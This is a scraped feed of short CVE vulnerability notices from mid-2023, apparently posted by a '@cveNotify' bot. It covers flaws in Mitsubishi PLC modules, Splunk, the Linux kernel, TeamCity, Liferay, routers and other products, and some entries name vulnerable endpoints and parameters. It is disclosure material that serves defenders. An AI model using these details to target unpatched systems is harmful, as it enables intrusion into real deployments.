🚨 CVE-2023-2060Weak Password Requirements vulnerability in FTP function on Mitsubishi Electric Corporation MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP allows a remote unauthenticated attacker to access to the module via FTP by dictionary attack or password sniffing.🎖@cveNotify |
|
| 2023-06-02 11:59:54 |
🚨 CVE-2023-2063Unrestricted Upload of File with Dangerous Type vulnerability in FTP function on Mitsubishi Electric Corporation MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP allows a remote unauthenticated attacker to cause information disclosure, tampering, deletion or destruction via file upload/download. As a result, the attacker may be able to exploit this for further attacks.🎖@cveNotify |
|
| 2023-06-02 11:59:53 |
🚨 CVE-2023-2062Missing Password Field Masking vulnerability in Mitsubishi Electric Corporation EtherNet/IP configuration tools SW1DNN-EIPCT-BD and SW1DNN-EIPCTFX5-BD allows a remote unauthenticated attacker to know the password for MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP. This vulnerability results in authentication bypass vulnerability, which allows the attacker to access MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP via FTP.🎖@cveNotify |
|
| 2023-06-01 22:58:12 |
🚨 CVE-2023-34339In JetBrains Ktor before 2.3.1 headers containing authentication data could be added to the exception's message🎖@cveNotify |
|
| 2023-06-01 21:58:18 |
🚨 CVE-2023-31763Weak security in the transmitter of AGShome Smart Alarm v1.0 allows attackers to gain full access to the system via a code replay attack.🎖@cveNotify |
|
| 2023-06-01 21:58:17 |
🚨 CVE-2023-2901A vulnerability was found in NFine Rapid Development Platform 20230511. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /SystemManage/User/GetGridJson?_search=false&nd=1680855479750&rows=50&page=1&sidx=F_CreatorTime+desc&sord=asc. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229975. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-01 21:58:13 |
🚨 CVE-2023-31458A vulnerability in the Edge Gateway component of Mitel MiVoice Connect versions 19.3 SP2 (22.24.1500.0) and earlier could allow an unauthenticated attacker with internal network access to authenticate with administrative privileges, because initial installation does not enforce a password change. A successful exploit could allow an attacker to make arbitrary configuration changes and execute arbitrary commands.🎖@cveNotify |
|
| 2023-06-01 21:58:12 |
🚨 CVE-2023-2903A vulnerability classified as problematic has been found in NFine Rapid Development Platform 20230511. This affects an unknown part of the file /SystemManage/Role/GetGridJson?keyword=&page=1&rows=20. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229977 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-01 18:58:33 |
🚨 CVE-2023-32310DataEase is an open source data visualization and analysis tool. The API interface for DataEase delete dashboard and delete system messages is vulnerable to insecure direct object references (IDOR). This could result in a user deleting another user's dashboard or messages or interfering with the interface for marking messages read. The vulnerability has been fixed in v1.18.7. There are no known workarounds aside from upgrading.🎖@cveNotify |
|
| 2023-06-01 18:58:32 |
🚨 CVE-2023-32310DataEase is an open source data visualization and analysis tool. The API interface for DataEase delete dashboard and delete system messages is vulnerable to insecure direct object references (IDOR). This could result in a user deleting another user's dashboard or messages or interfering with the interface for marking messages read. The vulnerability has been fixed in v1.18.7. There are no known workarounds aside from upgrading.🎖@cveNotify |
|
| 2023-06-01 18:58:31 |
🚨 CVE-2023-32324OpenPrinting CUPS is an open source printing system. In versions 2.4.2 and prior, a heap buffer overflow vulnerability would allow a remote attacker to launch a denial of service (DoS) attack. A buffer overflow vulnerability in the function `format_log_line` could allow remote attackers to cause a DoS on the affected system. Exploitation of the vulnerability can be triggered when the configuration file `cupsd.conf` sets the value of `loglevel `to `DEBUG`. No known patches or workarounds exist at time of publication.🎖@cveNotify |
|
| 2023-06-01 18:58:27 |
🚨 CVE-2023-32324OpenPrinting CUPS is an open source printing system. In versions 2.4.2 and prior, a heap buffer overflow vulnerability would allow a remote attacker to launch a denial of service (DoS) attack. A buffer overflow vulnerability in the function `format_log_line` could allow remote attackers to cause a DoS on the affected system. Exploitation of the vulnerability can be triggered when the configuration file `cupsd.conf` sets the value of `loglevel `to `DEBUG`. No known patches or workarounds exist at time of publication.🎖@cveNotify |
|
| 2023-06-01 18:58:26 |
🚨 CVE-2023-32706On Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an unauthenticated attacker can send specially-crafted messages to the XML parser within SAML authentication to cause a denial of service in the Splunk daemon.🎖@cveNotify |
|
| 2023-06-01 18:58:25 |
🚨 CVE-2023-32712In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an attacker can use a specially crafted web URL in their browser to cause log file poisoning. The attack requires the attacker to have secure shell (SSH) access to the instance and use a terminal program that supports a certain feature set to execute the attack successfully.🎖@cveNotify |
|
| 2023-06-01 18:58:24 |
🚨 CVE-2023-32707In versions of Splunk Enterprise below 9.0.5, 8.2.11, and 8.1.14, and Splunk Cloud Platform below version 9.0.2303.100, a low-privileged user who holds a role that has the ‘edit_user’ capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests.🎖@cveNotify |
|
| 2023-06-01 18:58:20 |
🚨 CVE-2023-32708In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, and Splunk Cloud Platform versions below 9.0.2303.100, a low-privileged user can trigger an HTTP response splitting vulnerability with the ‘rest’ SPL command that lets them potentially access other REST endpoints in the system arbitrarily.🎖@cveNotify |
|
| 2023-06-01 18:58:19 |
🚨 CVE-2023-32715In the Splunk App for Lookup File Editing versions below 4.0.1, a user can insert potentially malicious JavaScript code into the app, which causes that code to run on the user’s machine. The app itself does not contain the potentially malicious JavaScript code. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser, and requires additional user interaction to trigger. The attacker cannot exploit the vulnerability at will.🎖@cveNotify |
|
| 2023-06-01 18:58:18 |
🚨 CVE-2023-32716In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, and Splunk Cloud Platform versions below 9.0.2303.100, an attacker can exploit a vulnerability in the {{dump}} SPL command to cause a denial of service by crashing the Splunk daemon.🎖@cveNotify |
|
| 2023-06-01 18:58:14 |
🚨 CVE-2023-32717On Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, and in Splunk Cloud Platform versions below 9.0.2303.100, an unauthorized user can access the {{/services/indexing/preview}} REST endpoint to overwrite search results if they know the search ID (SID) of an existing search job.🎖@cveNotify |
|
| 2023-06-01 18:58:13 |
🚨 CVE-2023-32711In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, a Splunk dashboard view lets a low-privileged user exploit a vulnerability in the Bootstrap web framework (CVE-2019-8331) and build a stored cross-site scripting (XSS) payload.🎖@cveNotify |
|
| 2023-06-01 18:58:12 |
🚨 CVE-2023-32713In Splunk App for Stream versions below 8.1.1, a low-privileged user could use a vulnerability in the streamfwd process within the Splunk App for Stream to escalate their privileges on the machine that runs the Splunk Enterprise instance, up to and including the root user.🎖@cveNotify |
|
| 2023-06-01 16:58:32 |
🚨 CVE-2023-2236A use-after-free vulnerability in the Linux Kernel io_uring subsystem can be exploited to achieve local privilege escalation.Both io_install_fixed_file and its callers call fput in a file in case of an error, causing a reference underflow which leads to a use-after-free vulnerability.We recommend upgrading past commit 9d94c04c0db024922e886c9fd429659f22f48ea4.🎖@cveNotify |
|
| 2023-06-01 16:58:31 |
🚨 CVE-2023-30846typed-rest-client is a library for Node Rest and Http Clients with typings for use with TypeScript. Users of the typed-rest-client library version 1.7.3 or lower are vulnerable to leak authentication data to 3rd parties. The flow of the vulnerability is as follows: First, send any request with `BasicCredentialHandler`, `BearerCredentialHandler` or `PersonalAccessTokenCredentialHandler`. Second, the target host may return a redirection (3xx), with a link to a second host. Third, the next request will use the credentials to authenticate with the second host, by setting the `Authorization` header. The expected behavior is that the next request will *NOT* set the `Authorization` header. The problem was fixed in version 1.8.0. There are no known workarounds.🎖@cveNotify |
|
| 2023-06-01 16:58:30 |
🚨 CVE-2023-28484In libxml2 before 2.10.4, parsing of certain invalid XSD schemas can lead to a NULL pointer dereference and subsequently a segfault. This occurs in xmlSchemaFixupComplexType in xmlschemas.c.🎖@cveNotify |
|
| 2023-06-01 16:58:29 |
🚨 CVE-2023-29469An issue was discovered in libxml2 before 2.10.4. When hashing empty dict strings in a crafted XML document, xmlDictComputeFastKey in dict.c can produce non-deterministic values, leading to various logic and memory errors, such as a double free. This behavior occurs because there is an attempt to use the first byte of an empty string, and any value is possible (not solely the '\0' value).🎖@cveNotify |
|
| 2023-06-01 16:58:25 |
🚨 CVE-2023-20873In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+.🎖@cveNotify |
|
| 2023-06-01 16:58:24 |
🚨 CVE-2023-27043The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python.🎖@cveNotify |
|
| 2023-06-01 16:58:23 |
🚨 CVE-2023-28856Redis is an open source, in-memory database that persists on disk. Authenticated users can use the `HINCRBYFLOAT` command to create an invalid hash field that will crash Redis on access in affected versions. This issue has been addressed in in versions 7.0.11, 6.2.12, and 6.0.19. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-06-01 16:58:22 |
🚨 CVE-2023-1872A use-after-free vulnerability in the Linux Kernel io_uring system can be exploited to achieve local privilege escalation.The io_file_get_fixed function lacks the presence of ctx->uring_lock which can lead to a Use-After-Free vulnerability due a race condition with fixed files getting unregistered.We recommend upgrading past commit da24142b1ef9fd5d36b76e36bab328a5b27523e8.🎖@cveNotify |
|
| 2023-06-01 16:58:21 |
🚨 CVE-2023-1829A use-after-free vulnerability in the Linux Kernel traffic control index filter (tcindex) can be exploited to achieve local privilege escalation. The tcindex_delete function which does not properly deactivate filters in case of a perfect hashes while deleting the underlying structure which can later lead to double freeing the structure. A local attacker user can use this vulnerability to elevate its privileges to root.We recommend upgrading past commit 8c710f75256bb3cf05ac7b1672c82b92c43f3d28.🎖@cveNotify |
|
| 2023-06-01 14:58:23 |
🚨 CVE-2023-2888A vulnerability, which was classified as problematic, was found in PHPOK 6.4.100. This affects an unknown part of the file /admin.php?c=upload&f=zip&_noCache=0.1683794968. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The identifier VDB-229953 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-01 14:58:22 |
🚨 CVE-2023-28370Open redirect vulnerability in Tornado versions 6.3.1 and earlier allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having user access a specially crafted URL.🎖@cveNotify |
|
| 2023-06-01 14:58:21 |
🚨 CVE-2023-22652A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in openSUSE libeconf leads to DoS via malformed config files.This issue affects libeconf: before 0.5.2.🎖@cveNotify |
|
| 2023-06-01 14:58:19 |
🚨 CVE-2023-32181A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in openSUSE libeconf allows for DoS via malformed configuration filesThis issue affects libeconf: before 0.5.2.🎖@cveNotify |
|
| 2023-06-01 14:58:18 |
🚨 CVE-2010-10010A vulnerability classified as problematic has been found in Stars Alliance PsychoStats up to 3.2.2a. This affects an unknown part of the file upload/admin/login.php. The manipulation of the argument ref leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 3.2.2b is able to address this issue. The name of the patch is 5d3b7311fd5085ec6ea1b1bfa9a05285964e07e4. It is recommended to upgrade the affected component. The identifier VDB-230265 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-01 14:58:17 |
🚨 CVE-2022-4332In Sprecher Automation SPRECON-E-C/P/T3 CPU in variant PU244x a vulnerable firmware verification has been identified. Through physical access and hardware manipulation, an attacker might be able to bypass hardware-based code verification and thus inject and execute arbitrary code and gain full access of the device.🎖@cveNotify |
|
| 2023-06-01 14:58:16 |
🚨 CVE-2022-4333Hardcoded Credentials in multiple SPRECON-E CPU variants of Sprecher Automation allows an remote attacker to take over the device. These accounts should be deactivated according to Sprecher's hardening guidelines.🎖@cveNotify |
|
| 2023-06-01 14:58:15 |
🚨 CVE-2023-3028Insufficient authentication in the MQTT backend (broker) allows an attacker to access and even manipulate the telemetry data of the entire fleet of vehicles using the HopeChart HQT-401 telematics unit. Other models are possibly affected too.Multiple vulnerabilities were identified:- The MQTT backend does not require authentication, allowing unauthorized connections from an attacker.- The vehicles publish their telemetry data (e.g. GPS Location, speed, odometer, fuel, etc) as messages in public topics. The backend also sends commands to the vehicles as MQTT posts in public topics. As a result, an attacker can access the confidential data of the entire fleet that is managed by the backend.- The MQTT messages sent by the vehicles or the backend are not encrypted or authenticated. An attacker can create and post messages to impersonate a vehicle or the backend. The attacker could then, for example, send incorrect information to the backend about the vehicle's location.- The backend can inject data into a vehicle´s CAN bus by sending a specific MQTT message on a public topic. Because these messages are not authenticated or encrypted, an attacker could impersonate the backend, create a fake message and inject CAN data in any vehicle managed by the backend.The confirmed version is 201808021036, however further versions have been also identified as potentially impacted.🎖@cveNotify |
|
| 2023-06-01 14:58:14 |
🚨 CVE-2023-3029A vulnerability has been found in Guangdong Pythagorean OA Office System up to 4.50.31 and classified as problematic. This vulnerability affects unknown code of the file /note/index/delete. The manipulation of the argument id leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-230458 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-01 10:58:22 |
🚨 CVE-2018-25086A vulnerability was found in sea75300 FanPress CM up to 3.6.3. It has been classified as problematic. This affects the function getArticlesPreview of the file inc/controller/action/system/templatepreview.php of the component Template Preview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 3.6.4 is able to address this issue. The name of the patch is c380d343c2107fcee55ab00eb8d189ce5e03369b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230235.🎖@cveNotify |
|
| 2023-06-01 10:58:21 |
🚨 CVE-2022-4332In Sprecher Automation SPRECON-E-C/P/T3 CPU in variant PU244x a vulnerable firmware verification has been identified. Through physical access and hardware manipulation, an attacker might be able to bypass hardware-based code verification and thus inject and execute arbitrary code and gain full access of the device.🎖@cveNotify |
|
| 2023-06-01 10:58:20 |
🚨 CVE-2022-4333Hardcoded Credentials in multiple SPRECON-E CPU variants of Sprecher Automation allows an remote attacker to take over the device. These accounts should be deactivated according to Sprecher's hardening guidelines.🎖@cveNotify |
|
| 2023-06-01 10:58:19 |
🚨 CVE-2023-3028Insufficient authentication in the MQTT backend (broker) allows an attacker to access and even manipulate the telemetry data of the entire fleet of vehicles using the HopeChart HQT-401 telematics unit. Other models are possibly affected too.Multiple vulnerabilities were identified:- The MQTT backend does not require authentication, allowing unauthorized connections from an attacker.- The vehicles publish their telemetry data (e.g. GPS Location, speed, odometer, fuel, etc) as messages in public topics. The backend also sends commands to the vehicles as MQTT posts in public topics. As a result, an attacker can access the confidential data of the entire fleet that is managed by the backend.- The MQTT messages sent by the vehicles or the backend are not encrypted or authenticated. An attacker can create and post messages to impersonate a vehicle or the backend. The attacker could then, for example, send incorrect information to the backend about the vehicle's location.- The backend can inject data into a vehicle´s CAN bus by sending a specific MQTT message on a public topic. Because these messages are not authenticated or encrypted, an attacker could impersonate the backend, create a fake message and inject CAN data in any vehicle managed by the backend.The confirmed version is 201808021036, however further versions have been also identified as potentially impacted.🎖@cveNotify |
|
| 2023-06-01 10:58:18 |
🚨 CVE-2023-3029A vulnerability has been found in Guangdong Pythagorean OA Office System up to 4.50.31 and classified as problematic. This vulnerability affects unknown code of the file /note/index/delete. The manipulation of the argument id leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-230458 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-01 10:58:16 |
🚨 CVE-2023-33297Bitcoin Core before 24.1, when debug mode is not used, allows attackers to cause a denial of service (CPU consumption) because draining the inventory-to-send queue is inefficient, as exploited in the wild in May 2023.🎖@cveNotify |
|
| 2023-06-01 10:58:15 |
🚨 CVE-2023-24584Controller 6000 is vulnerable to a buffer overflow via the Controller diagnostic web interface upload feature. This issue affects Controller 6000: before vCR8.80.230201a, before vCR8.70.230201a, before vCR8.60.230201b, before vCR8.50.230201a, all versions of vCR8.40 and prior.🎖@cveNotify |
|
| 2023-06-01 05:58:14 |
🚨 CVE-2023-33461iniparser v4.1 is vulnerable to NULL Pointer Dereference in function iniparser_getlongint which misses check NULL for function iniparser_getstring's return.🎖@cveNotify |
|
| 2023-06-01 05:58:13 |
🚨 CVE-2023-33719mp4v2 v2.1.3 was discovered to contain a memory leak via MP4SdpAtom::Read() at atom_sdp.cpp🎖@cveNotify |
|
| 2023-06-01 05:58:12 |
🚨 CVE-2023-34312In Tencent QQ through 9.7.8.29039 and TIM through 3.4.7.22084, QQProtect.exe and QQProtectEngine.dll do not validate pointers from inter-process communication, which leads to a write-what-where condition.🎖@cveNotify |
|
| 2023-06-01 00:58:13 |
🚨 CVE-2023-2884Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG), Use of Insufficiently Random Values vulnerability in CBOT Chatbot allows Signature Spoofing by Key Recreation.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-06-01 00:58:12 |
🚨 CVE-2023-2886Missing Origin Validation in WebSockets vulnerability in CBOT Chatbot allows Content Spoofing Via Application API Manipulation.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-05-31 23:58:32 |
🚨 CVE-2023-33642H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit_BasicSSID interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-05-31 23:58:31 |
🚨 CVE-2023-33629H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-05-31 23:58:30 |
🚨 CVE-2023-33632H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the ipqos_lanip_dellist interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-05-31 23:58:26 |
🚨 CVE-2023-33633H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the UpdateWanParams interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-05-31 23:58:25 |
🚨 CVE-2022-30025SQL injection in "/Framewrk/Home.jsp" file (POST method) in tCredence Analytics iDEAL Wealth and Funds - 1.0 iallows authenticated remote attackers to inject payload via "v" parameter.🎖@cveNotify |
|
| 2023-05-31 23:58:24 |
🚨 CVE-2023-33942Cross-site scripting (XSS) vulnerability in the Web Content Display widget's article selector in Liferay Liferay Portal 7.4.3.50, and Liferay DXP 7.4 update 50 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a web content article's `Title` field.🎖@cveNotify |
|
| 2023-05-31 23:58:20 |
🚨 CVE-2023-33939Cross-site scripting (XSS) vulnerability in the Modified Facet widget in Liferay Portal 7.1.0 through 7.4.3.12, and Liferay DXP 7.1 before fix pack 27, 7.2 before fix pack 18, 7.3 before update 4, and 7.4 before update 9 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a facet label.🎖@cveNotify |
|
| 2023-05-31 23:58:19 |
🚨 CVE-2023-2750Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cityboss E-municipality allows SQL Injection.This issue affects E-municipality: before 6.05.🎖@cveNotify |
|
| 2023-05-31 23:58:18 |
🚨 CVE-2023-33950Pattern Redirects in Liferay Portal 7.4.3.48 through 7.4.3.76, and Liferay DXP 7.4 update 48 through 76 allows regular expressions that are vulnerable to ReDoS attacks to be used as patterns, which allows remote attackers to consume an excessive amount of server resources via crafted request URLs.🎖@cveNotify |
|
| 2023-05-31 23:58:14 |
🚨 CVE-2023-2586Teltonika’s Remote Management System versions 4.14.0 is vulnerable to an unauthorized attacker registering previously unregistered devices through the RMS platform. If the user has not disabled the "RMS management feature" enabled by default, then an attacker could register that device to themselves. This could enable the attacker to perform different operations on the user's devices, including remote code execution with 'root' privileges (using the 'Task Manager' feature on RMS).🎖@cveNotify |
|
| 2023-05-31 23:58:13 |
🚨 CVE-2023-32347Teltonika’s Remote Management System versions prior to 4.10.0 use device serial numbers and MAC addresses to identify devices from the user perspective for device claiming and from the device perspective for authentication. If an attacker obtained the serial number and MAC address of a device, they could authenticate as that device and steal communication credentials of the device. This could allow an attacker to enable arbitrary command execution as root by utilizing management options within the newly registered devices.🎖@cveNotify |
|
| 2023-05-31 23:58:12 |
🚨 CVE-2023-33949In Liferay Portal 7.3.0 and earlier, and Liferay DXP 7.2 and earlier the default configuration does not require users to verify their email address, which allows remote attackers to create accounts using fake email addresses or email addresses which they don't control. The portal property `company.security.strangers.verify` should be set to true.🎖@cveNotify |
|
| 2023-05-31 20:58:29 |
🚨 CVE-2015-10108A vulnerability was found in meitar Inline Google Spreadsheet Viewer Plugin up to 0.9.6 on WordPress and classified as problematic. Affected by this issue is the function displayShortcode of the file inline-gdocs-viewer.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 0.9.6.1 is able to address this issue. The name of the patch is 2a8057df8ca30adc859cecbe5cad21ac28c5b747. It is recommended to upgrade the affected component. VDB-230234 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-31 20:58:28 |
🚨 CVE-2022-35754Unified Write Filter Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-05-31 20:58:24 |
🚨 CVE-2022-35758Windows Kernel Memory Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-05-31 20:58:23 |
🚨 CVE-2023-26277IBM QRadar WinCollect Agent 10.0 though 10.1.3 could allow a local user to execute commands on the system due to execution with unnecessary privileges. IBM X-Force ID: 248156.🎖@cveNotify |
|
| 2023-05-31 20:58:22 |
🚨 CVE-2023-33718mp4v2 v2.1.3 was discovered to contain a memory leak via MP4File::ReadString() at mp4file_io.cpp🎖@cveNotify |
|
| 2023-05-31 20:58:19 |
🚨 CVE-2023-33722EDIMAX BR-6288ACL v1.12 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the pppUserName parameter.🎖@cveNotify |
|
| 2023-05-31 20:58:18 |
🚨 CVE-2023-34088Collabora Online is a collaborative online office suite. A stored cross-site scripting (XSS) vulnerability was found in Collabora Online prior to versions 22.05.13, 21.11.9.1, and 6.4.27. An attacker could create a document with an XSS payload as a document name. Later, if an administrator opened the admin console and navigated to the history page, the document name was injected as unescaped HTML and executed as a script inside the context of the admin console. The administrator JSON web token (JWT) used for the websocket connection could be leaked through this flaw. Users should upgrade to Collabora Online 22.05.13 or higher; Collabora Online 21.11.9.1 or higher; Collabora Online 6.4.27 or higher to receive a patch.🎖@cveNotify |
|
| 2023-05-31 20:58:17 |
🚨 CVE-2022-35747Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-05-31 20:58:13 |
🚨 CVE-2022-35744Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-05-31 20:58:12 |
🚨 CVE-2022-35753Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-05-31 16:58:34 |
🚨 CVE-2023-31548A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2023-05-31 16:58:33 |
🚨 CVE-2023-34228In JetBrains TeamCity before 2023.05 authentication checks were missing – 2FA was not checked for some sensitive account actions🎖@cveNotify |
|
| 2023-05-31 16:58:32 |
🚨 CVE-2023-3013Unchecked Return Value in GitHub repository gpac/gpac prior to 2.2.2.🎖@cveNotify |
|
| 2023-05-31 16:58:31 |
🚨 CVE-2023-3014A vulnerability, which was classified as problematic, was found in BeipyVideoResolution up to 2.6. Affected is an unknown function of the file admin/admincore.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-230358 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-31 16:58:27 |
🚨 CVE-2023-3015A vulnerability has been found in yiwent Vip Video Analysis 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file data/title.php. The manipulation of the argument titurl leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230359.🎖@cveNotify |
|
| 2023-05-31 16:58:26 |
🚨 CVE-2023-34218In JetBrains TeamCity before 2023.05 bypass of permission checks allowing to perform admin actions was possible🎖@cveNotify |
|
| 2023-05-31 16:58:25 |
🚨 CVE-2023-34220In JetBrains TeamCity before 2023.05 stored XSS in the Commit Status Publisher window was possible🎖@cveNotify |
|
| 2023-05-31 16:58:21 |
🚨 CVE-2023-34221In JetBrains TeamCity before 2023.05 stored XSS in the Show Connection page was possible🎖@cveNotify |
|
| 2023-05-31 16:58:20 |
🚨 CVE-2023-34222In JetBrains TeamCity before 2023.05 possible XSS in the Plugin Vendor URL was possible🎖@cveNotify |
|
| 2023-05-31 16:58:19 |
🚨 CVE-2023-34224In JetBrains TeamCity before 2023.05 open redirect during oAuth configuration was possible🎖@cveNotify |
|
| 2023-05-31 16:58:18 |
🚨 CVE-2023-34225In JetBrains TeamCity before 2023.05 stored XSS in the NuGet feed page was possible🎖@cveNotify |
|
| 2023-05-31 16:58:14 |
🚨 CVE-2023-34226In JetBrains TeamCity before 2023.05 reflected XSS in the Subscriptions page was possible🎖@cveNotify |
|
| 2023-05-31 16:58:13 |
🚨 CVE-2023-3012NULL Pointer Dereference in GitHub repository gpac/gpac prior to 2.2.2.🎖@cveNotify |
|
| 2023-05-31 16:58:12 |
🚨 CVE-2023-2629Improper Neutralization of Formula Elements in a CSV File in GitHub repository pimcore/customer-data-framework prior to 3.3.9.🎖@cveNotify |
|
| 2023-05-31 14:58:19 |
🚨 CVE-2023-33736A stored cross-site scripting (XSS) vulnerability in Dcat-Admin v2.1.3-beta allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL parameter.🎖@cveNotify |
|
| 2023-05-31 14:58:18 |
🚨 CVE-2023-3009Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-05-31 14:58:14 |
🚨 CVE-2018-3280Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: JSON). Supported versions that are affected are 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-05-31 14:58:13 |
🚨 CVE-2018-3279Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Roles). Supported versions that are affected are 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-05-31 14:58:12 |
🚨 CVE-2018-3212Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Information Schema). Supported versions that are affected are 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-05-31 13:58:12 |
🚨 CVE-2023-2909EZ Sync service fails to adequately handle user input, allowing an attacker to navigate beyond the intended directory structure and delete files. Affected products and versions include: ADM 4.0.6.REG2, 4.1.0 and below as well as ADM 4.2.1.RGE2 and below.🎖@cveNotify |
|
| 2023-05-31 11:58:26 |
🚨 CVE-2022-29825Use of Hard-coded Password vulnerability in Mitsubishi Electric GX Works3 versions from 1.000A to 1.090U and GT Designer3 Version1 (GOT2000) versions from 1.122C to 1.290C allows an unauthenticated attacker to disclose sensitive information. As a result, unauthenticated users may view programs and project files or execute programs illegally.🎖@cveNotify |
|
| 2023-05-31 11:58:25 |
🚨 CVE-2022-25164Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GX Works3 all versions and Mitsubishi Electric MX OPC UA Module Configurator-R all versions allows a remote unauthenticated attacker to disclose sensitive information. As a result, unauthenticated users can gain unauthorized access to the MELSEC CPU module and the MELSEC OPC UA server module.🎖@cveNotify |
|
